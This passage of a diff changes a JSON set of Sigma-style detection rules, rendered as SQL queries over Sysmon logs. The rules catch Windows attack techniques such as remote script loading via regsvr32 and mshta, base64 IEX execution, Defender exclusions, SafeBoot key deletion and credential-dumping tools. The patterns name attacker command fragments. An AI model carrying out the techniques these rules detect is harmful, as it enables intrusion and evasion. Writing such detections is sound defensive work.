LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Start of NT Virtual DOS Machine", - "id": "16905e21-66ee-42fe-b256-1318ada2d770", - "status": "experimental", - "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", - "author": "frack113", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", + "status": "test", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ - "attack.defense_evasion" + "attack.g0004", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden 
-value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_16bit_application.yml" + "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", - "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "title": "Run PowerShell Script from ADS", + "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "status": "test", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1564.004" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": 
"proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "Registry Modification Via Regini.EXE", - "id": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", - "status": "experimental", - "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate modification of keys" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND NOT (CommandLine REGEXP ':[^ \\\\]'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regini_execution.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", - "status": "experimental", - "description": 
"Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", + "title": "Sysmon Configuration Update", + "id": "87911521-7098-470b-a459-9a57fc80bdfd", + "status": "test", + "description": "Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrators might use this command to update Sysmon configuration." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" }, { - "title": "Launch-VsDevShell.PS1 Proxy Execution", - "id": "45d3a03d-f441-458c-8883-df101a3bb146", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", "status": "experimental", - "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" 
commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1216.001" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of the script by a developer" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" + "filename": "proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
(ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_hktl_safetykatz.yml" }, { - "title": "Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", - "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" + ], "falsepositives": [ - "Legitimate scripts that use IEX" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE 
'\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Execute Code with Pester.bat as Parent", - "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "title": "JSC Convert Javascript To Executable", + "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", "status": "experimental", - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1216" + "attack.t1127" ], "falsepositives": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE 
(EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pester.yml" + "filename": "proc_creation_win_lolbin_jsc.yml" }, { - "title": "Powershell Defender Exclusion", - "id": "17769c90-230e-488b-a463-e05c08e9d48f", - "status": "experimental", - "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", - "author": "Florian Roth (Nextron Systems)", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", + "status": "test", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_defender_exclusion.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", - "id": "55f0a3a1-846e-40eb-8273-677371b8d912", - "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Other legitimate network providers used and not filtred in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": 
"Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", "status": "experimental", - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "Sysprep on AppData Folder", 
- "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", + "title": "Suspicious Query of MachineGUID", + "id": "f5240972-3938-4e56-8e4b-e33893176c1f", "status": "test", - "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", - "author": "Florian Roth (Nextron Systems)", + "description": "Use of reg to get MachineGuid information", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Cryptography%' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%MachineGuid%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysprep_appdata.yml" + "filename": "proc_creation_win_reg_machineguid.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", - "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "status": "experimental", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", 
- "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218.010" ], "falsepositives": [ - "Unknown" + "FQDNs that start with a number" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Service Security Descriptor Tampering Via Sc.EXE", - "id": "98c5aeef-32d5-492f-b174-64a691896d25", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "status": "experimental", - "description": "Detection of sc.exe utility adding a new service with 
special permission which hides that service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_modification.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "Suspicious Execution Of PDQDeployRunner", - "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate use of the PDQDeploy tool to execute these commands" + "Legitimate use" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = 
